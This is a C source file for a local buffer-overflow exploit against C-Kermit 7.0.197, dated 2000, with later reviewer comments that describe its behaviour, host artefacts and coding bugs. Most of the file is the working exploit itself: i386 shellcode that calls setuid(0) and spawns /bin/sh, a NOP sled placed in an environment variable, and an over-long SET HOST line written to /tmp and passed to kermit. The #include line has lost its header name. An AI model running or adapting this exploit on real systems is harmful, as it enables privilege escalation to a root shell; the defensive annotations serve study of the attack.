/*
 * C-Kermit local exploit.
 * Versions: 7.0.197 (Maybe others).
 * Available at: www.columbia.edu/kermit/
 *
 * By: Cody Tubbs (loophole of hhp).
 * shouts to v9. :), *icesk, rpc, tgb,
 * syscon, houston peeps, meta`, duke,
 * ism, blkforge, sk8, and #hhp.
 *
 * Date: 9/19/2000.
 * Web: www.hhp-programming.net
 * Mail: pigspigs@yahoo.com
 *
 * Tested on slack7.
 * non s*id by default on linux.
 * [suid on Olivetti X/OS R2.3, 3.x]
 *
 * .. ribbit.. . ribbit.. . ribbit.. SPLAT!.
 *******************************************/

/*
 * Reviewer notes (defensive reading of this listing):
 *  - The listing feeds kermit an over-long "SET HOST" argument from a
 *    command file; any privilege impact depends on the kermit binary being
 *    set-uid, which the header above says is not the Linux default.
 *  - Host-observable artefacts of a run: a file at TMP containing the
 *    "SET HOST" line, an environment variable named RIBBIT, and an exec of
 *    /usr/local/bin/kermit with that file as its only argument.
 *  - The #include directive below has lost its header name (most likely
 *    stripped during HTML extraction); the listing does not compile as shown.
 */
#include
#define OFFSET -5000 // Tested on slack7.
#define NOP 0x90
#define TMP "/tmp/.kerm"
#define DBUF 1200

/*
 * Payload bytes placed after a NOP sled in the RIBBIT environment variable.
 * The literal contains the string "/bin/sh". Kept verbatim from the listing.
 */
static char shellcode[] =
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07"
    "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
    "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80"
    "\xe8\xdc\xff\xff\xff/bin/sh\x69";

/*
 * Returns the current stack pointer. There is no return statement: the
 * function relies on the inline asm leaving %esp in %eax, the i386 return
 * register. That is undefined behaviour in C and only meaningful on 32-bit
 * x86.
 */
long get_sp(void){
    __asm__("movl %esp,%eax");
}

/*
 * Entry point. argv[1], if present, overrides the return-address offset.
 * Implicit int return type (pre-C99 style). On success the function does
 * not return, because execlp replaces the process image.
 */
main(int argc, char *argv[]){
    char eipeip[DBUF], buffer[4096];
    int i, offset;
    FILE *ribbit;
    long address;

    /* atoi() reports no errors; a non-numeric argument silently becomes 0. */
    if(argc > 1){
        offset = atoi(argv[1]);
    }else{
        offset = OFFSET;
    }
    address = get_sp() - offset;

    /* Fill eipeip with the guessed address repeated every 4 bytes.
     * Assumes sizeof(long) == 4: with an 8-byte long the final store at
     * i == 1196 runs 4 bytes past the array. The char* -> long* cast also
     * ignores alignment and aliasing rules. No NUL terminator is ever
     * written, so strlen(eipeip) and the "%s" use below read past the
     * array (undefined behaviour). */
    for(i = 0 ; i < DBUF ; i += 4){
        *(long *)&eipeip[i] = address;
    }

    /* NOP sled followed by the payload. The loop bound mixes int with
     * size_t, so it is evaluated unsigned: if the two strlen() results
     * ever exceed 4096 the subtraction wraps and the loop overruns buffer.
     * Nothing writes a terminating '\0' into buffer before putenv(). */
    for( i = 0 ; i < (4096 - strlen(shellcode) - strlen(eipeip)) ; i++){
        buffer[i] = NOP;
    }
    memcpy(buffer + i, shellcode, strlen(shellcode));
    memcpy(buffer, "RIBBIT=", 7); // Using env var due to command
    putenv(buffer);               // line shellcode char(hotkey)
                                  // truncate problems.

    /* %#x expects unsigned int but address is a long: mismatched format. */
    fprintf(stderr, "Return address %#x, offset: %d.\n", address, offset);

    /* Fixed, predictable path in /tmp that is unlinked and then reopened
     * for writing: a symlink-race exposure for whoever runs this. fopen()'s
     * result is used without a NULL check. */
    unlink(TMP);
    ribbit = fopen(TMP, "w");
    fprintf(ribbit, "SET HOST %s\n", eipeip);
    fclose(ribbit);

    /* A bare 0 as the argument-list terminator of a variadic call is not a
     * portable null pointer; (char *)NULL is the documented sentinel. */
    execlp("/usr/local/bin/kermit", "kermit", TMP, 0);
}